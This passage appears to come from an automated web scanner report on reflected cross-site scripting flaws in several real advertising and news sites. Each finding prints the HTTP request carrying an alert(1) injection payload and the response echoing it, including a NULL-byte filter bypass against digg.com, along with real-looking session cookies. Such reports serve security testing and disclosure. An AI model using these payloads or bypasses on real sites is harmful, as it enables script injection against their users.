HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:28:39 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/76270152007<script>alert(1)</script>c5f391e0619

7.17. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8c95c<script>alert(1)</script>c39d081d6c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/7790458c95c<script>alert(1)</script>c39d081d6c9?d=17608843913132534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:43:06 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/7790458c95c<script>alert(1)</script>c39d081d6c9

7.18. http://ads.adbrite.com/adserver/vdi/806205 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 171e1<script>alert(1)</script>9b1cb3d1ccd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/806205171e1<script>alert(1)</script>9b1cb3d1ccd?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:46:00 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/806205171e1<script>alert(1)</script>9b1cb3d1ccd

7.19. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload c9203<script>alert(1)</script>12cc57e2eb0 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=c9203<script>alert(1)</script>12cc57e2eb0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:40:30 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/c9203<script>alert(1)</script>12cc57e2eb0MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY

7.20. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f436"-alert(1)-"09796207443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1521132&8f436"-alert(1)-"09796207443=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 02 May 2011 02:10:11 GMT
Pragma: no-cache
Content-Length: 4325
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?8f436"-alert(1)-"09796207443=1&Z=300x250&s=1521132&_salt=2629575304";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

7.21. http://digg.com/tools/diggthis.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004206e"><script>alert(1)</script>8e049f903a4 was submitted in the REST URL parameter 1. This input was echoed as 4206e"><script>alert(1)</script>8e049f903a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /tools%004206e"><script>alert(1)</script>8e049f903a4/diggthis.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Tue, 03-May-2011 02:44:40 GMT; path=/; domain=digg.com
Set-Cookie: d=4613de18b6c542b61379940db09b5bbd6945796e3fc646c022194fedaff30823; expires=Sat, 01-May-2021 12:52:20 GMT; path=/; domain=.digg.com
X-Digg-Time: D=638324 10.2.129.49
Vary: Accept-Encoding
Cneonction: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16999

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools%004206e"><script>alert(1)</script>8e049f903a4/diggthis.js.rss">
...[SNIP]...

7.22. http://digg.com/tools/diggthis.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fac8d"><script>alert(1)</script>efc759f39a3 was submitted in the REST URL parameter 2. This input was echoed as fac8d"><script>alert(1)</script>efc759f39a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /tools/diggthis.js%00fac8d"><script>alert(1)</script>efc759f39a3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 03-May-2011 02:44:57 GMT; path=/; domain=digg.com
Set-Cookie: d=dbc3b6621d940455b22731ca1a1c09a089781e5816736e7f487763dbd8526321; expires=Sat, 01-May-2021 12:52:37 GMT; path=/; domain=.digg.com
X-Digg-Time: D=950979 10.2.129.156
Vary: Accept-Encoding
nnCoection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17000

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%00fac8d"><script>alert(1)</script>efc759f39a3.rss">
...[SNIP]...

7.23. http://guru.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcae3'%3balert(1)//08cf1cf24cb was submitted in the h parameter. This input was echoed as dcae3';alert(1)//08cf1cf24cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF&w=300&h=250dcae3'%3balert(1)//08cf1cf24cb&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:26:10 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250dcae3';alert(1)//08cf1cf24cb" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

7.24. http://guru.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 797d2"%3balert(1)//dc8428cd2c7 was submitted in the pid parameter. This input was echoed as 797d2";alert(1)//dc8428cd2c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF797d2"%3balert(1)//dc8428cd2c7&w=300&h=250&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:25:30 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF797d2";alert(1)//dc8428cd2c7&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWC
...[SNIP]...

7.25. http://guru.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c758f'%3balert(1)//df004e2400e was submitted in the w parameter. This input was echoed as c758f';alert(1)//df004e2400e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF&w=300c758f'%3balert(1)//df004e2400e&h=250&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:25:50 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300c758f';alert(1)//df004e2400e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

7.26. http://hit.blvdstatus.com/t [tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hit.blvdstatus.com
Path:   /t

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7241e'%3balert(1)//f5921333a0a was submitted in the tid parameter. This input was echoed as 7241e';alert(1)//f5921333a0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /t?tid=BS-d8cfb33d-27241e'%3balert(1)//f5921333a0a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: hit.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:15 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 2974

var __seoq_h = 'http://hit.blvdstatus.com';var __seoq_o = true;var __seoq_t = 'BS-d8cfb33d-27241e';alert(1)//f5921333a0a';var __seoq_s = 'sd8c4dbe198f6eff30.86464733';
function __seoq_get_host(x)
{var m;if(m=x.match(/(http|ftp|https):\/\/(.*?)\/.*$/)){return m[2];}}
function BLVD(){var c=this._Get_Cookie('blvdS');if(c){
...[SNIP]...

7.27. http://insurancenewsnet.com/article.aspx [_TSM_HiddenField_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff3e7'%3balert(1)//1e4b9f7a9ac was submitted in the _TSM_HiddenField_ parameter. This input was echoed as ff3e7';alert(1)//1e4b9f7a9ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /article.aspx?_TSM_HiddenField_=ctl00_tsm_HiddenFieldff3e7'%3balert(1)//1e4b9f7a9ac&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.11119.20010%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3af115bb7c-9ed9-4839-b013-8ca60f25e300%3a865923e8%3a91bd373d%3a596d588c%3a411fea1c%3ae7c87f07%3abbfda34c%3a30a78ec5%3a42b7c466 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pddqwnm3cm5gjqvccrmz1345; INNid=pddqwnm3cm5gjqvccrmz1345

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Mon, 30 Apr 2012 23:34:39 GMT
Last-Modified: Wed, 27 Apr 2011 14:28:05 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:34:39 GMT
Content-Length: 122119

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
false);
//END AjaxControlToolkit.PopupControl.PopupControlBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_tsm_HiddenFieldff3e7';alert(1)//1e4b9f7a9ac').value += ';;AjaxControlToolkit, Version=1.0.11119.20010, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:f115bb7c-9ed9-4839-b013-8ca60f25e300:865923e8:91bd373d:596d588c:411fea1c:e7c87f07:bbfd
...[SNIP]...

7.28. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68af2'%3balert(1)//795c1f771d3 was submitted in the admeld_callback parameter. This input was echoed as 68af2';alert(1)//795c1f771d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match68af2'%3balert(1)//795c1f771d3 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
